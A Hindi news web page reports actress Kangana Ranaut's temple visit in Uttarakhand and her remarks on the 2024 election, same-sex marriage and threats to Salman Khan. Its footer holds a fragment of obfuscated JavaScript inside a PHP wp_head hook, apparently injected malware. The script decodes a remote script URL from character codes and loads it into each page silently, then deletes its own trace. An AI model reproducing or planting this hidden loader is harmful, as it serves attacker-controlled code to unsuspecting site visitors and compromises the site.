Saturday, July 27, 2024
spot_img

सलमान खान को डरने की जरूरत नहीं  सरकार हमारे साथ- कंगना राणावत

बॉलीवुड अभिनेत्री कंगना राणावत धार्मिक यात्रा पर उत्तराखंड पहुंची हुई है, अभिनेत्री कंगना राणावत ने निरंजनी अखाड़े के आचार्य महामंडलेश्वर कैलाशानंद गिरि का आशीर्वाद लिया और दक्षिण काली मंदिर में मां की पूजा अर्चना कर गंगा आरती में भाग लिया, कंगना राणावत केदारनाथ के दर्शन करने भी जाएगी, साथ ही प्रधानमंत्री नरेंद्र मोदी ने जिस गुफा में तपस्या की थी उस गुफा के भी दर्शन करेगी, कंगना राणावत ने कहा कि उत्तराखंड देव भूमि है यहां आकर उनको अलग ही अनुभूति हुई है, वही 2024 के लोकसभा चुनाव को लेकर कंगना राणावत ने कहा जो 2019 में जनता ने फैसला दिया था वहीं 2024 में भी होने वाला है, सलमान खान को मिली धमकी के मामले पर कंगना राणावत ने कहा हमारी सुरक्षा प्रधानमंत्री नरेंद्र मोदी और अमित शाह कर रहे हैं हमें किसी से डरने की जरूरत नहीं।
बॉलीवुड अभिनेत्री कंगना राणावत का कहना है कि उत्तराखंड देव भूमि है यहां के कण-कण में देवी देवताओं का वास है आज मुझे मां गंगा के दर्शन और संतों का आशीर्वाद मिला, यह मेरे लिए सौभाग्य की बात है, कंगना राणावत का कहना है कि गंगा को स्वच्छ निर्मल बनाने के लिए सरकार अच्छा कार्य कर रही है पहले लोग इसके प्रति इतने जागरूक नहीं थे क्योंकि जब नदियों की दुर्दशा होती है तो मानवता की भी दुर्दशा होती है अच्छी बात है प्रधानमंत्री नरेंद्र मोदी मानवता के साथ धर्म का भी कल्याण कर रहे हैं कंगना राणावत का कहना है कि मेरी बहुत इच्छा थी कि में केदारनाथ में बाबा के दर्शन करूं क्योंकि केदारनाथ का पुराणों में वर्णन आता है अब मुझे इसका सौभाग्य प्राप्त हुआ है।

आगामी 2024 के लोकसभा चुनाव जैसे-जैसे नजदीक आ रहे हैं सभी राजनीतिक पार्टियां अपनी तैयारियों में जुट गई है बॉलीवुड अभिनेत्री कंगना राणावत लोकसभा चुनाव को लेकर कहा लोगों में काफी उत्सुकता है चुनाव को लेकर मगर 2024 में भी वही होने वाला है जो 2019 के लोकसभा चुनाव में हुआ था वही समलैंगिकता के मामले पर कंगना राणावत का कहना है कि शादी के रिश्ते दिल से होते हैं जब लोगों के दिल मिलते हैं तो उसके बारे में किसी को भी कुछ नहीं बोलना चाहिए।
बॉलीवुड अभिनेता सलमान खान को मिली धमकी के मामले पर कंगना राणावत का कहना है सलमान खान को सरकार द्वारा सुरक्षा मिली हुई है, जब उनकी रक्षा स्वयं देश के प्रधानमंत्री नरेंद्र मोदी और गृह मंत्री अमित शाह कर रहे हैं तो डरने की कोई बात नहीं है, जब मुझे धमकी मिली थी, तो मुझे भी सुरक्षा सरकार द्वारा दी गई थी, आज देश सुरक्षित हाथों में है।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>